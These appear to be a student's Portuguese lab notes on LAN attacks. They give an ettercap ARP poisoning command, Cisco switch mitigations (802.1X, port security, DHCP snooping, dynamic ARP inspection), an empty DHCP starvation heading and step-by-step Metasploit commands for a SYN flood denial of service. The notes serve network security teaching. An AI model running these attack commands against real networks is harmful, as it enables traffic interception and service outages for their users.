-------------------ARP POISONING ATTACK ---------------------

 1º Comando:  ettercap -TqM arp ///

TECNICAS DE MITIGAÇÃO:
1-configurar autenticação no swith
	aaa new-model
	aaa authentication dot1x default group radius
	dot1x system-auth-control
	interface range e0/1-3
 	switchport mode access
 	authentication control-direction in
 	authentication port-control auto

2-configurar port security no switch
	interface e0/0
	switchport mode access
	switchport port-security
 	switchport port-security maximum 2 (numero maximo de mac adress numa porta)
 	switchport port-security mac-adress mac-address <mac-address> (nesta interface so é permitido este mac-address)
	switchport port-security mac-address sticky (saves de running mac-addres na runnning config)
	switchport port-security violation restrict
	switchport port-security aging absolute/inactivity (absolute apaga mac-address passado x tempo / absolute apaga mac-address se este tiver inativo passado x tempo)
	switchport pot-security violation restrict (discards offending trafic, sends syslog message, increases violation counter)

3.configurar dhcp snooping no switch (DHCP spoofing)
	ip dhcp snooping
	ip dhcp snooping vlan 1
	int <trustedport> => ip dhcp snooping trust
	ip dhcp snooping limit rate <> (limita numero de dhcp discovery messages)

	

4-configurar dynamic arp inspection (DAI)
	ip arp inspection vlan 1
	ip arp inspection validate src-mac
	ip arp inspection validate dst-mac
	ip arp inspection validate ip


-------------------DHCP STARVATION-------------------------



-------------------SYNFLOOD ATTACK-------------------------

 1º Comando:  nmap -p1-10000 192.168.2.1  --------(10000= Ver todas a portas até á porta 10000) ----------- (192.168.2.1= IP DA MÁQUINA)
 2º Comando:  service postgresql start
 3º Comando:  msfconsole (Corre o mettasploit)
 4º Comando:  search synflood
 5º Comando:  use auxiiary/dos/tcp/synflood (Entrar na diretoria do ataque)
 6º Comando:  show options
 7º Comando:  set RHOSTS (IP DA MÁQUINA)
 8º Comando:  set RPORT (Número da Porta)
 9º Comando:  set NUM (Número de pacotes a enviar)
 10º Comando:  exploit (Começar o Ataque)
 11º Comando:  CTRL + C (Parar o ataque)






